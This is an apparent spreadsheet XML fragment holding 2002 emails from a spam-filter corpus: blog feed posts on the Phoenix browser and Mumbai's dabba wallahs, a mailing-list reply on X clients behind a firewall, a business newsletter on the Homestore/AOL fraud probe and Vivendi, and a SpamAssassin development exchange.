  </si>
  <si>
    <t>Missing the Point</t>
  </si>
  <si>
    <t>URL: [URL]http://www.mozillazine.org[/URL]\nDate: Not supplied\n\nA lot of people seem to be missing the point of Phoenix, as evidenced by the \nresponses on Mozilla News[1] and MozillaZine[2]. Let me emphasize something \nhere: if you think Mozilla's current UI is acceptable, then you are clearly not \nthe target audience for Phoenix.\n\nHere is a quiz to test whether or not Phoenix is the right browser for you.\n\n\n- The link toolbar is: \n\n\n- critical to my day-to-day use \n- vital when using Bugzilla! Doesn't everybody use Bugzilla?\n-  link what?\n\n\n\n- The sidebar is \n\n\n- indispensable since i run at 1600x1200 resolution \n- not cool enough, since i can't float and dock all my panels and have \nsplitters between all panels and see web page progress for individual HTML \npanels and check my email entirely from within sidebar and... \n- a waste of real estate\n\n\n\n- Form auto-fill \n\n\n- is not useful for me unless I can fill out 20 pages of personal information \nfirst \n- should just happen automatically\n\n\n\n- Downloads \n\n\n- should take place in a tree view with progress meters in the columns! \n- should be clearly visible and understandable.\n\n\n\n- Toolbars should \n\n\n- be dockable to all four corners of the screen, be able to float outside the \nwindow, be fully customizable such that I can make my own custom commands, be \nable to edit existing buttons' commands, be able to create my own toolbars, be \nable to put toolbars on the same line, and be able to edit the submenus and \ncontext menus of items (including the items on the menu bar) and browse my file \nsystem and cook me dinner and wash my car and walk my dog and do my taxes and \nmow my lawn and... \n- be customizable within reason\n\n\n\n- Composer should \n\n\n- always come with my browser. I want composer options all over my UI. \nEverywhere! \n- not be part of a Web browser.\n\n\n\n- Mail should \n\n\n- be part of my browser program. Aren't they the same app? There is a \ndifference? \n- be a separate application.\n\n\n\n\nNow to those people who want the full-blown functionality of the Mozilla trunk, \nyou can still get that with Phoenix. The idea is to relegate more features to \nthe "optional add-on" category. If you want the link toolbar or the sidebar or \nmouse gestures or any other features, you can download and install them \nyourself. I expect Phoenix will have a little add-in manager that will \nfacilitate this process. There is currently an expectation on the part of an \nalarming number of people that every feature implemented by anyone should \nautomatically be part of the default Mozilla install/download. \n\nWhy? \n\nA layered approach scales better. You can then have a browser that can become \nas complex as you want to make it, but the choice is left in your hands. The \ngeek features aren't inflicted on you by default.\n\nFinally, remember that Phoenix's UI is not controlled by Netscape. This is an \nopportunity for some of the core Mozilla Navigator developers to build the \nbrowser that they have always wanted to build, without having to compromise the \nuser interface to satisfy the various conflicting pressures exerted by factions \nwithin Netscape.\n\n[1] [URL]http://www.mozillanews.org[/URL]\n[2] [URL]http://www.mozillazine.org[/URL]</t>
  </si>
  <si>
    <t>http://www.mozillazine.org http://www.mozillanews.org http://www.mozillazine.org</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:11:43 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:11:43 -0000</t>
  </si>
  <si>
    <t>Dabba Wallahs: India's meal-delivery FedEx</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nAmazing story about the "dabba wallahs" -- India's 112-year-old meal-delivery \nsystem that outdoes FedEx using pictograms, bicycles, and largely illiterate \n(but well-compensated) deliverypeople: \n\n    As part of the tiffin distribution process, every day the meals are picked \n    up from commuters' homes in Mumbai long after the commuters have left for \n    work, delivered to them on time, then picked up and delivered home before \n    the commuters return. \n\n    Each tiffin carrier has, painted on its top, a number of symbols that \n    identify where the carrier was picked up, the originating and destination \n    stations and the address to which it is to be delivered. \n\n    After the tiffin carriers are picked up, they are taken to the nearest \n    railway station, where they are sorted according to the destination \n    station. \n\n    At the destination station they are unloaded by other dabba wallahs and \n    re-sorted, this time according to street address and floor. \n\n    The 80 kg crates of carriers, carried on dabba wallahs' heads, hand-wagons \n    and cycles are delivered at 12.30 p.m., picked up at 1.30 p.m., and \n    returned when they came. \n\n    The system relies on multiple relays of dabba wallahs, and a single tiffin \n    box may change hands up to three times during its journey from home to \n    office.  \n\nLink[1] Discuss[2] (_Thanks, Tom!_)\n\n[1] [URL]http://in.news.yahoo.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://in.news.yahoo.com http://www.quicktopic.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: diveintomark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:11:23 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:11:23 -0000</t>
  </si>
  <si>
    <t>Plan</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-09-25T10:43:06-05:00\n\n_Paul Ford_: Falling Off a Truck[1]. &amp;#8220;In the last 4 days I fell off a \ntruck and was dragged for 30 feet, and was interviewed by an NPR show. Those \ntwo facts are not related except that they both happened to me and made me \nqueasy. I also wrote a short plan outlining the rest of my life.&amp;#8221;\n\n\n\n[1] [URL]http://ftrain.com[/URL]</t>
  </si>
  <si>
    <t>Maps</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-09-25T10:45:15-05:00\n\n_Mark Tosczak_: A New Way to Read, Not See, Maps[1]. &amp;#8220;The map-navigation \nsoftware, dubbed Blind Audio Tactile Mapping System ... takes digital map \ninformation and provides nonvisual feedback as a user moves a cursor across the \nmap.&amp;#8221;\n\n\n\n[1] [URL]http://www.wired.com[/URL],1383,54916,00.html</t>
  </si>
  <si>
    <t>http://diveintomark.org http://www.wired.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: diveintomark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:11:22 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:11:22 -0000</t>
  </si>
  <si>
    <t>FOAF explorer</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-09-25T18:18:53-05:00\n\nMorten Frederiksen has taken a first stab at a real-time social network \nexplorer based on FOAF files. You could start on my profile[1] and explore from \nthere, or enter the URL of your own FOAF file (at the bottom of the page). It's \nheavy on tech details, but you can easily see the potential here. (It's also a \ngreat way to debug your FOAF file, if you added anything manually.) Now we need \nsomebody to build a spider that follows foaf:knows links and draws pretty \nsocial network diagrams, so we can see the forest for the trees.\n\n\n\n[1] [URL]http://xml.mfd-consult.dk[/URL]</t>
  </si>
  <si>
    <t>http://diveintomark.org http://xml.mfd-consult.dk</t>
  </si>
  <si>
    <t>To: "Joseph S. Barrera III" &lt;joe@barrera.org&gt;, "FoRK" &lt;fork@spamassassin.taint.org&gt;\nFrom: "Jason Ling" &lt;vytekdemise@hotmail.com&gt;\nDate: Thu, 26 Sep 2002 12:43:19 -0400</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 12:43:19 -0400</t>
  </si>
  <si>
    <t>"Jason Ling" &lt;vytekdemise@hotmail.com&gt;</t>
  </si>
  <si>
    <t>"Joseph S. Barrera III" &lt;joe@barrera.org&gt;, "FoRK" &lt;fork@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>------=_NextPart_001_0004_01C2655A.4ABB3500 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable ----- Original Message ----- From: Joseph S. Barrera III Sent: Wednesday, September 25, 2002 7:06 PM To: FoRK Subject: dumb question: X client behind a firewall? Let's say you're behind a firewall and have a NAT address. Is there any way to telnet to a linux box out there in the world and set your DISPLAY in some way that you can create xterms on your own screen? - Joe -------------------- I'm in no way a pro but perhaps you could set your Firewall to accept con= nections from that Linux box and then somehow set the Linux box to transm= it on a specific port. Then configure your router to forward all informat= ion from that port to your box. But then again, that pretty much defeats the entire point of a firewall =3D= P.Get more from the Web.  FREE MSN Explorer download : [URL]http://explorer.ms[/URL] n.com ------=_NextPart_001_0004_01C2655A.4ABB3500 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Â  &lt;= DIV&gt;Â  =  ----- Original Message ----- From: Joseph S. Barrera III Sent: Wednesday, September 25, 2002 7:06 PM To: FoRK Subject: dumb question: X client behind a firewall? Â  L= et's say you're behind a firewall and have a NAT address.Is there any=  way to telnet to a linux box out there in the worldand set your DISP= LAY in some way that you can createxterms on your own screen?= - Joe Â  -------------------- I'm in no way a pr= o but perhaps you could set your Firewall to accept connections from that=  Linux box and then somehow set the Linux box to transmit on a specific p= ort. Then configure your router to forward all information from that port=  to your box. Â  But then again, that pretty much defea= ts the entire point of a firewall =3DP.Get more from the Web.  FREE MSN Explorer download : [URL]http://explorer.msn.com[/URL] ------=_NextPart_001_0004_01C2655A.4ABB3500--</t>
  </si>
  <si>
    <t>http://explorer.ms http://explorer.msn.com</t>
  </si>
  <si>
    <t>To: zzz-unspun@example.com\nFrom: "Media Unspun" &lt;guterman@mediaunspun.imakenews.net&gt;\nDate: Thu, 26 Sep 2002 09:28:03 -0400</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 09:28:03 -0400</t>
  </si>
  <si>
    <t>AOL Keyword: Fraud Probe</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format... ------------=_1033046883-23957-4 Content-Type: text/plain; charset="iso-8859-1" Content-Disposition: inline Content-Transfer-Encoding: 7bit To view this newsletter in full-color, visit: [URL]http://newsletter.mediaunspun.com[/URL] Media Unspun What the Press is Reporting and Why ([URL]www.mediaunspun.com[/URL] ----------------------------------------------------------------- September 26, 2002 ----------------------------------------------------------------- IN THIS ISSUE ----------------------------------------------------------------- * AOL KEYWORD: FRAUD PROBE * VIVENDI MEETS THE NEW BOSS * OTHER STORIES ----------------------------------------------------------------- EDITOR'S NOTE ----------------------------------------------------------------- Is Media Unspun useful to you? Then pass it on to a colleague. The more readers we have, the more successful we'll be. The more  successful we are, the more useful we can be to you. Pass it on!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 ADVERTISEMENT ----------------------------------------------------------------- Pop!Tech 2002 October 18 - 20, 2002: Camden, Maine Join 500 big thinkers to discuss the collision of technology and culture Register now at: [URL]http://www.poptech.org[/URL] ----------------------------------------------------------------- AOL KEYWORD: FRAUD PROBE ----------------------------------------------------------------- Another three bite the dust. Three former executives from real estate dot-com Homestore have agreed to plead guilty to criminal  charges and repay $4.6 million in stock gains. What's more interesting is that they'll cooperate with an investigation into  AOL's role in the dubious dealing. This is the most real estate drama you'll get this week without renting "Glengarry Glen Ross." Homestore's former COO was charged with wire fraud and conspiracy to commit securities fraud (up to 10 years in jail), the former CFO with just the conspiracy charge (up to five years), and an ex-VP with insider trading (less time, but unknown). The big accusation here is "round tripping," in which Homestore would buy goods from a company as long as the company then spent most of the money on AOL ads. Then AOL would supposedly spend the same amount of money at Homestore, "thus allowing Homestore effectively to 'buy' revenue using its own cash," explained the Wall Street Journal. Homestore has become a cause celebre for Attorney General John Ashcroft, who held a press conference to emphasize that the Bush  administration really means it about this corporate clean-up thing. Neither Ashcroft, the Justice Department, nor the SEC named names, referring only to Homestore's relationship with "a major media company." Nice try for anonymity, but AOL Time Warner was the only major media company Homestore dealt with, observed the New York Times. Now the heat's on AOL while investigators try and figure out how much of AOL's revenue was inflated like a Thanksgiving Day Parade float.   The L.A. Times' sources said AOL execs pointed the finger at former company dealmaker Eric Keller. The Journal led with, and expanded on, this info. It seems two of the three busted Homestore execs are expected to say Keller helped Homestore do its round-tripping, and that some AOL ad revenue that looked legit on paper really came from Homestore. Keller has already been pink-slipped for shady deals with Homestore and another company; his boss got booted last month for possible book-cooking.  So where's the perp walk? The umbrella stand? The theatrics that  make the corporate crime beat great? We're kidding (mostly), but  that could be why overseas outlets barely noticed this comparatively tame example of American excess. The Journal had one amusing tidbit, though: After Keller got fired, AOL vice chairman Ted Leonsis hired him as a consultant for the hockey team the Washington Capitals, of which Leonsis is the majority owner. Leonsis said he let Keller go after finding out why he lost his AOL job, but Keller still picked up his Capitals phone as of Wednesday. As outrageous severance packages go, it's no Jack Welsh/GE $9 million annual pension, but it'll have to do. -  Jen Muehlbauer Homestore Executives Agree to Guilty Pleas  [URL]http://www.washingtonpost.com[/URL] Homestore, AOL Ad Deals Yield Guilty Pleas (USA Today) [URL]http://tinyurl.com[/URL] U.S. Focuses on Executive at Homestore [URL]http://www.nytimes.com[/URL] Homestore's Ex-Execs to Aid Investigators [URL]http://www.latimes.com[/URL],0,5107257.story Probe of Homestore Turns To an Ex-AOL Executive [URL]http://online.wsj.com[/URL],,SB1032971619118707713,00.html (Paid registration required.) Jack Welch's Very Golden Years  [URL]http://www.fool.com[/URL] Glengarry Glen Ross  [URL]http://us.imdb.com[/URL] ----------------------------------------------------------------- ADVERTISEMENT ----------------------------------------------------------------- What's Really Going on at Microsoft? Mary Jo Foley delivers unmatched reporting and insight with MICROSOFT WATCH.  Track initiatives like .Net, Palladium, Longhorn, Trinity, Yukon; release dates, competitive moves, people. For a FREE 14-day trial subscription: [URL]https://ziffdavis.omeda.com[/URL] ----------------------------------------------------------------- VIVENDI MEETS THE NEW BOSS ----------------------------------------------------------------- What does Vivendi want to be when it grows up? The media can't figure it out. Can CEO Jean-Rene Fourtou? His fuzziness at yesterday's board meeting got reporters to wondering. If he can't explain his vision, does that mean he's lacking the 20/20 clarity that observers on two continents were banking on? For Fourtou, worse than the Monsieur Magoo accusations are the comparisons, starting to bubble through media accounts, that he resembles -- wait, we're rubbing our eyes -- the vilified Jean-Marie Messier. Media watchers can rate reporters' confusion over Fourtou's latest pronouncements by tallying the amount of space outlets devoted to their coverage of the mess. The New York Times ran 24  paragraphs on the board meeting -- and then filed another 19 in an analysis that sought to examine what the latest moves meant.   The Financial Times posted two articles on the meeting and still  had more to say, lambasting Fourtou in Lex, the peach paper's influential column. Lex called the exec's update "more like a rambling fireside chat ... than a strategy presentation." There's little that's clear about what's ahead for Vivendi. The company now says that it will dispose of 12 billion euros worth of assets over the next 18 months. Here's how reporters examining the tea leaves read the current plan: Out are Telepiu,  an Italian pay-TV operation, and Canal Plus Technologies, a maker of set-top boxes. On the way out are Vivendi's publishing properties, which include Houghton Mifflin, and a minority stake  in a PC gamemaker. That leaves Vivendi's stake in telecom, via its Cegetel investment, and its Universal entertainment properties, and -- hey, wait a minute, wasn't that Messier's plan, the New York Times wondered by way of an analyst's quote. To confuse matters further, News Corp., the alleged partner in the done deal for Telepiu, says no deal is in place, according to the Financial Times. As for Cegetel, Fourtou said he'd consider selling Vivendi's 44% stake; then again, maybe he'll increase it. And that was all in one post-meeting telephone conference.  The only decision by Vivendi in which Fourtou seemed sure was his claim that the company won't pay any severance to Messier. "He enjoyed making deals too much and overpaid," the Guardian quoted Fourtou as saying, and then adding, "This all went to his  head."  With heads other than Messier's now in question, is Vivendi's viability again in doubt? Outlets today report that Enron's logo, the oversize capital "E" that stood outside its headquarters, sold at auction for $44,000. How many euros might a V bring? - Deborah Asbrand Vivendi Will Move Quickly to Sell Many Assets [URL]http://www.nytimes.com[/URL] What's New at Vivendi? Depends Who's Talking [URL]http://www.nytimes.com[/URL] Vivendi in Move to Sell Raft of Assets (Financial Times) [URL]http://tinyurl.com[/URL] Vivendi Board to Deny Messier Severance Pay (Financial Times) [URL]http://tinyurl.com[/URL] Lex: Vivendi Universal (Financial Times)  [URL]http://tinyurl.com[/URL] News Corp Counters Report of Telepiu Sale (Financial Times) [URL]http://tinyurl.com[/URL] Vivendi Aims to Realise Eu12bn from Asset Sales (Daily Telegraph) [URL]http://tinyurl.com[/URL] Messier 'won't get a penny'  [URL]http://media.guardian.co.uk[/URL],7497,799283,00.html Vivendi Shakes Up Board, Denies Messier's Severance [URL]http://www.latimes.com[/URL],0,481695.story Enron Auctions Off Furniture and Famous 'E' [URL]http://www.nytimes.com[/URL] ----------------------------------------------------------------- OTHER STORIES ----------------------------------------------------------------- HP Boosts Layoffs By 1,800 [URL]http://www.siliconvalley.com[/URL] Former WorldCom Controller To Plead Guilty To Two counts (Wall Street Journal) [URL]http://www.msnbc.com[/URL] Tyco Rewarded an Executive During a Grand Jury Inquiry [URL]http://www.nytimes.com[/URL] Bell Labs Researcher Falsified Experiments (AP) [URL]http://www.chron.com[/URL] Germany's Neuer Markt to close [URL]http://news.bbc.co.uk[/URL] Resources Dry Up As Joblessness Drags On (USA Today) [URL]http://tinyurl.com[/URL] Merrill Aide to Plead Guilty (Wall Street Journal) [URL]http://www.msnbc.com[/URL] Enron Ex-CFO Clears His Throat For Feds  [URL]http://www.nypost.com[/URL] Music Labels Seek Piracy Payback [URL]http://www.latimes.com[/URL],0,388519.story ----------------------------------------------------------------- Do you want to reach the Net's savviest audience? Advertise in Media Unspun. Contact Erik Vanderkolk for details at erikvanderkolk@yahoo.com  today. ----------------------------------------------------------------- STAFF ----------------------------------------------------------------- Written by Deborah Asbrand (dasbrand@world.std.com), Keith Dawson (dawson@world.std.com), Jen Muehlbauer (jen@englishmajor.com), and Lori Patel (loripatel@hotmail.com). Copyedited by Jim Duffy (jimduffy86@yahoo.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________________ POWERED BY: [URL]http://www.imakenews.com[/URL] To be removed from this list, use this link: [URL]http://www.imakenews.com[/URL] To receive future messages in HTML format, use this link: [URL]http://www.imakenews.com[/URL] To change your subscriber information, use this link: [URL]http://www.imakenews.com[/URL] ------------=_1033046883-23957-4 Content-Type: text/html; charset="iso-8859-1" Content-Disposition: inline Content-Transfer-Encoding: 7bit     Media Unspun   Pass it on... 					 					What the Press is Reporting and Why ([URL]www.mediaunspun.com[/URL] 					 					 				 				 					 					 						 							Thursday, September 26, 2002 						 					 					 					 				 Top Spins... 			 						 				 			 			AOL Keyword: Fraud Probe 			 				 			 			 			 			 			 						 				 			 			Vivendi Meets the New Boss 			 				 			 			 			 			 			 						 				 			 			Other Stories 			 				 			 			 			 			 			 			 			 			 			 			Editor's Note 			 			 			 Is Media Unspun useful to you? Then pass it on to a colleague. The more readers we have, the more successful we'll be. The more successful we are, the more useful we can be to you. Pass it on! Media Unspun serves business news and analysis, authoritatively and irreverently, every business day. An annual subscription costs $50, less than a dollar a week. If your four-week free trial is coming to an end soon, please visit [URL]http://www.mediaunspun.com[/URL]  and sign up via credit card or check. Sponsor Pop!Tech 2002 October 18 - 20, 2002: Camden, Maine Join 500 big thinkers to discuss the collision of technology and culture Register now at: [URL]http://www.poptech.org[/URL]  			 			 			 			 			 			AOL Keyword: Fraud Probe 			 			 			 Another three bite the dust. Three former executives from real estate dot-com Homestore have agreed to plead guilty to criminal charges and repay $4.6 million in stock gains. What's more interesting is that they'll cooperate with an investigation into AOL's role in the dubious dealing. This is the most real estate drama you'll get this week without renting "Glengarry Glen Ross." Homestore's former COO was charged with wire fraud and conspiracy to commit securities fraud (up to 10 years in jail), the former CFO with just the conspiracy charge (up to five years), and an ex-VP with insider trading (less time, but unknown). The big accusation here is "round tripping," in which Homestore would buy goods from a company as long as the company then spent most of the money on AOL ads. Then AOL would supposedly spend the same amount of money at Homestore, "thus allowing Homestore effectively to 'buy' revenue using its own cash," explained the Wall Street Journal. Homestore has become a cause celebre for Attorney General John Ashcroft, who held a press conference to emphasize that the Bush administration really means it about this corporate clean-up thing. Neither Ashcroft, the Justice Department, nor the SEC named names, referring only to Homestore's relationship with "a major media company." Nice try for anonymity, but AOL Time Warner was the only major media company Homestore dealt with, observed the New York Times. Now the heat's on AOL while investigators try and figure out how much of AOL's revenue was inflated like a Thanksgiving Day Parade float. The L.A. Times' sources said AOL execs pointed the finger at former company dealmaker Eric Keller. The Journal led with, and expanded on, this info. It seems two of the three busted Homestore execs are expected to say Keller helped Homestore do its round-tripping, and that some AOL ad revenue that looked legit on paper really came from Homestore. Keller has already been pink-slipped for shady deals with Homestore and another company; his boss got booted last month for possible book-cooking. So where's the perp walk? The umbrella stand? The theatrics that make the corporate crime beat great? We're kidding (mostly), but that could be why overseas outlets barely noticed this comparatively tame example of American excess. The Journal had one amusing tidbit, though: After Keller got fired, AOL vice chairman Ted Leonsis hired him as a consultant for the hockey team the Washington Capitals, of which Leonsis is the majority owner. Leonsis said he let Keller go after finding out why he lost his AOL job, but Keller still picked up his Capitals phone as of Wednesday. As outrageous severance packages go, it's no Jack Welsh/GE $9 million annual pension, but it'll have to do. - Jen Muehlbauer Homestore Executives Agree to Guilty Pleas  [URL]http://www.washingtonpost.com[/URL]  Homestore, AOL Ad Deals Yield Guilty Pleas (USA Today) [URL]http://tinyurl.com[/URL]  U.S. Focuses on Executive at Homestore [URL]http://www.nytimes.com[/URL]  Homestore's Ex-Execs to Aid Investigators [URL]http://www.latimes.com[/URL],0,5107257.story  Probe of Homestore Turns To an Ex-AOL Executive [URL]http://online.wsj.com[/URL],,SB1032971619118707713,00.html  (Paid registration required.) Jack Welch's Very Golden Years  [URL]http://www.fool.com[/URL]  Glengarry Glen Ross  [URL]http://us.imdb.com[/URL]  Sponsor What's Really Going on at Microsoft? Mary Jo Foley delivers unmatched reporting and insight with MICROSOFT WATCH.  Track initiatives like .Net, Palladium, Longhorn, Trinity, Yukon; release dates, competitive moves, people. For a FREE 14-day trial subscription: [URL]https://ziffdavis.omeda.com[/URL]  			 			 			 			 			 			Vivendi Meets the New Boss 			 			 			 What does Vivendi want to be when it grows up? The media can't figure it out. Can CEO Jean-RenÃ© Fourtou? His fuzziness at yesterday's board meeting got reporters to wondering. If he can't explain his vision, does that mean he's lacking the 20/20 clarity that observers on two continents were banking on? For Fourtou, worse than the Monsieur Magoo accusations are the comparisons, starting to bubble through media accounts, that he resembles -- wait, we're rubbing our eyes -- the vilified Jean-Marie Messier. Media watchers can rate reporters' confusion over Fourtou's latest pronouncements by tallying the amount of space outlets devoted to their coverage of the mess. The New York Times ran 24 paragraphs on the board meeting -- and then filed another 19 in an analysis that sought to examine what the latest moves meant.  The Financial Times posted two articles on the meeting and still had more to say, lambasting Fourtou in Lex, the peach paper's influential column. Lex called the exec's update "more like a rambling fireside chat ... than a strategy presentation." There's little that's clear about what's ahead for Vivendi. The company now says that it will dispose of 12 billion euros worth of assets over the next 18 months. Here's how reporters examining the tea leaves read the current plan: Out are Telepiu, an Italian pay-TV operation, and Canal Plus Technologies, a maker of set-top boxes. On the way out are Vivendi's publishing properties, which include Houghton Mifflin, and a minority stake in a PC gamemaker. That leaves Vivendi's stake in telecom, via its Cegetel investment, and its Universal entertainment properties, and -- hey, wait a minute, wasn't that Messier's plan, the New York Times wondered by way of an analyst's quote. To confuse matters further, News Corp., the alleged partner in the done deal for Telepiu, says no deal is in place, according to the Financial Times. As for Cegetel, Fourtou said he'd consider selling Vivendi's 44% stake; then again, maybe he'll increase it. And that was all in one post-meeting telephone conference.  The only decision by Vivendi in which Fourtou seemed sure was his claim that the company won't pay any severance to Messier. "He enjoyed making deals too much and overpaid," the Guardian quoted Fourtou as saying, and then adding, "This all went to his head."  With heads other than Messier's now in question, is Vivendi's viability again in doubt? Outlets today report that Enron's logo, the oversize capital "E" that stood outside its headquarters, sold at auction for $44,000. How many euros might a V bring? - Deborah Asbrand Vivendi Will Move Quickly to Sell Many Assets [URL]http://www.nytimes.com[/URL]  What's New at Vivendi? Depends Who's Talking [URL]http://www.nytimes.com[/URL]  Vivendi in Move to Sell Raft of Assets (Financial Times) [URL]http://tinyurl.com[/URL]  Vivendi Board to Deny Messier Severance Pay (Financial Times) [URL]http://tinyurl.com[/URL]  Lex: Vivendi Universal (Financial Times)  [URL]http://tinyurl.com[/URL]  News Corp Counters Report of Telepiu Sale (Financial Times) [URL]http://tinyurl.com[/URL]  Vivendi Aims to Realise Eu12bn from Asset Sales (Daily Telegraph) [URL]http://tinyurl.com[/URL]  Messier 'won't get a penny'  [URL]http://media.guardian.co.uk[/URL],7497,799283,00.html  Vivendi Shakes Up Board, Denies Messier's Severance [URL]http://www.latimes.com[/URL],0,481695.story  Enron Auctions Off Furniture and Famous 'E' [URL]http://www.nytimes.com[/URL]  			 			 			 			 			 			Other Stories 			 			 			 HP Boosts Layoffs By 1,800 [URL]http://www.siliconvalley.com[/URL]  Former WorldCom Controller To Plead Guilty To Two counts (Wall Street Journal) [URL]http://www.msnbc.com[/URL]  Tyco Rewarded an Executive During a Grand Jury Inquiry [URL]http://www.nytimes.com[/URL]  Bell Labs Researcher Falsified Experiments (AP) [URL]http://www.chron.com[/URL]  Germany's Neuer Markt to close [URL]http://news.bbc.co.uk[/URL]  Resources Dry Up As Joblessness Drags On (USA Today) [URL]http://tinyurl.com[/URL]  Merrill Aide to Plead Guilty (Wall Street Journal) [URL]http://www.msnbc.com[/URL]  Enron Ex-CFO Clears His Throat For Feds  [URL]http://www.nypost.com[/URL]  Music Labels Seek Piracy Payback [URL]http://www.latimes.com[/URL],0,388519.story  Sponsor 			 				 					 					Do you want to reach the Net's savviest audience? Advertise in Media Unspun. Contact Erik Vanderkolk for details at erikvanderkolk@yahoo.com today. 					 					 			 			 			 			 			 			Staff 			 			 			 			 				 					 					Written by Deborah Asbrand (dasbrand@world.std.com), Keith Dawson (dawson@world.std.com), Jen Muehlbauer (jen@englishmajor.com), and Lori Patel (loripatel@hotmail.com). Copyedited by Jim Duffy (jimduffy86@yahoo.com). Marketing: Cowpoke Productions (cowpokeproductions.com). Advertising: Erik Vanderkolk (erikvanderkolk@yahoo.com). Editor and publisher: Jimmy Guterman (guterman@vineyard.com). Media Unspun is produced by The Vineyard Group Inc. Copyright 2002 Media Unspun, Inc., and The Vineyard Group, Inc. Subscribe already, willya? [URL]http://www.mediaunspun.com[/URL] Redistribution by email is permitted as long as a link to [URL]http://newsletter.mediaunspun.com[/URL] is included. 					 					 		 		Subscribe 		 	 Enter your email address in the box below to receive a free four-week trial of Media Unspun:  			 			Add 			 		 	 		 		 		Remove 		SendasHTML Â  	 	   Newsletter Services Provided by iMakeNews.com Advertisement Tell a Friend... Powered by iMakeNews.comâ„¢ This email was sent to: zzz-unspun@example.com Click here to be instantly removed from this list.Click here to receive future messages in plain text format.Click here to change your subscriber information and preferences. Â  		    	            ------------=_1033046883-23957-4--</t>
  </si>
  <si>
    <t>http://newsletter.mediaunspun.com www.mediaunspun.com http://www.mediaunspun.com http://www.poptech.org http://www.washingtonpost.com http://tinyurl.com http://www.nytimes.com http://www.latimes.com http://online.wsj.com http://www.fool.com http://us.imdb.com https://ziffdavis.omeda.com http://www.nytimes.com http://www.nytimes.com http://tinyurl.com http://tinyurl.com http://tinyurl.com http://tinyurl.com http://tinyurl.com http://media.guardian.co.uk http://www.latimes.com http://www.nytimes.com http://www.siliconvalley.com http://www.msnbc.com http://www.nytimes.com http://www.chron.com http://news.bbc.co.uk http://tinyurl.com http://www.msnbc.com http://www.nypost.com http://www.latimes.com http://www.mediaunspun.com http://newsletter.mediaunspun.com http://www.imakenews.com http://www.imakenews.com http://www.imakenews.com http://www.imakenews.com www.mediaunspun.com http://www.mediaunspun.com http://www.poptech.org http://www.washingtonpost.com http://tinyurl.com http://www.nytimes.com http://www.latimes.com http://online.wsj.com http://www.fool.com http://us.imdb.com https://ziffdavis.omeda.com http://www.nytimes.com http://www.nytimes.com http://tinyurl.com http://tinyurl.com http://tinyurl.com http://tinyurl.com http://tinyurl.com http://media.guardian.co.uk http://www.latimes.com http://www.nytimes.com http://www.siliconvalley.com http://www.msnbc.com http://www.nytimes.com http://www.chron.com http://news.bbc.co.uk http://tinyurl.com http://www.msnbc.com http://www.nypost.com http://www.latimes.com http://www.mediaunspun.com http://newsletter.mediaunspun.com</t>
  </si>
  <si>
    <t>To: Daniel Quinlan &lt;quinlan@pathname.com&gt;\nFrom: "Allen Smith" &lt;easmith@beatrice.rutgers.edu&gt;\nDate: Thu, 26 Sep 2002 09:05:08 -0400</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 09:05:08 -0400</t>
  </si>
  <si>
    <t>"Allen Smith" &lt;easmith@beatrice.rutgers.edu&gt;</t>
  </si>
  <si>
    <t>Re: GA Development (was Re: [SAdev] [Bug 1030] NO_INVENTORY</t>
  </si>
  <si>
    <t>On Sep 25,  7:35pm, Daniel Quinlan wrote: &gt; Allen Smith  writes: &gt;  &gt; &gt; Well, I have been doing a bit of fiddling with the GA. I don't have &gt; &gt; a _large_ corpus practically available to me (or processable within &gt; &gt; reasonable processor time - I can justify the GA fiddling part as &gt; &gt; being part of my research, but not the mail processing...), so in &gt; &gt; order to test out my changes someone needs to send me a copy of the &gt; &gt; "tmp/scores.h" and "tmp/tests.h" that get generated prior to the GA &gt; &gt; going into action. &gt;  &gt; Why not start with mass-check corpus results? It's much easier to get &gt; those Ah. As in getting a directory listing of the corpus server and doing some downloads? OK, done. &gt; and you can create your own tmp/scores.h and tmp/tests.h. Good point. Will report back on my results. 	-Allen --  Allen Smith			[URL]http://cesario.rutgers.edu[/URL] September 11, 2001		A Day That Shall Live In Infamy II "They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety." - Benjamin Franklin</t>
  </si>
  <si>
    <t>http://cesario.rutgers.edu</t>
  </si>
  <si>
    <t>To: Anders Eriksson &lt;aeriksson@fastmail.fm&gt;\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Thu, 26 Sep 2002 09:04:07 -0500</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 09:04:07 -0500</t>
  </si>
  <si>
    <t>Re: Bug report: msg n+1 marked read</t>
  </si>
  <si>
